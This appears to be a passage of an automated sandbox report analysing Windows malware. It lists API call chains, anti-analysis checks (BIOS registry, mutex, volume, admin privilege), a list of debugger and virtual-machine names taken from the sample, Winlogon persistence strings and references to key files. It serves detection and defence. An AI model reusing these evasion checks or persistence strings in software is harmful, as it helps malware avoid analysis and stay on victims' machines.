Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	5_2_028B27C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	5_2_028937E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	5_2_028B0F40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	5_2_028B2750
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	5_2_02897D50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	6_2_024567D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	6_2_02455230
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	6_2_02463B90
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserNameA,memset,StrStrIA,	6_2_0245A8E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	6_2_02461160
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	6_2_02441170
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	6_2_0245C900
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	6_2_02463910
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	6_2_024621E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	6_2_02441660
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	6_2_02460F40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	6_2_02462750
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	6_2_024627C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	6_2_024437E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	6_2_0244D7A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	6_2_02447D50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	8_2_012F67D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	8_2_01303910
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	8_2_012FC900
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	8_2_01301160
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	8_2_012E1170
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	8_2_013021E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserNameA,memset,StrStrIA,	8_2_012FA8E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	8_2_01303B90
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	8_2_012F5230
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	8_2_012E7D50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	8_2_01302750
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	8_2_01300F40
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	8_2_012ED7A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	8_2_012E37E0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	8_2_013027C0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	8_2_012E1660

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date		0_2_00403870
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date		1_2_00403870

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\apppatch\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_1-65285
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\Desktop\Bonelessness.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess

graph_0-21033

Found evasive API chain checking for user administrative privileges

Source: C:\Windows\apppatch\svchost.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_1-65364
Source: C:\Users\user\Desktop\Bonelessness.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_0-21066

Found stalling execution ending in API Sleep call

Source: C:\Windows\apppatch\svchost.exe

Stalling execution: Execution stalls by calling Sleep

graph_1-64871

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: IDAG.EXE
Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: NOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLSYSTEMDRIVESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON%XSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNUSERINIT\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\DRIVERS\NTFS.SYSNTDLL.DLLRTLUNIFORMKERNEL32.DLLISWOW64PROCESSKERNEL.DLLA
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: NAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: VNAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: JbrLYfXaOpqnSngA.exe, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204407847.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000008.00000002.2204253925.0000000001280000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2204024511.0000000000A00000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 0000000D.00000002.2203789493.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2046984833.0000000002E40000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000010.00000002.2047246012.0000000002FE0000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052376389.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000013.00000002.2052202062.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2052668868.0000000000C20000.00000040.00000001.00020000.00000000.sdmp, JbrLYfXaOpqnSngA.exe, 00000015.00000002.2054528935.0000000002440000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00401DE0 rdtsc

0_2_00401DE0

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D37300 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification,

1_2_02D37300

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 4279			Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Window / User API: threadDelayed 5581			Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Evaded block: after key decision	graph_1-65032
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Evaded block: after key decision
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Evaded block: after key decision
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Evaded block: after key decision

Source: C:\Users\user\Desktop\Bonelessness.exe

Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess

graph_0-21176

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D37430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,VirtualQuery,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	1_2_02D37430
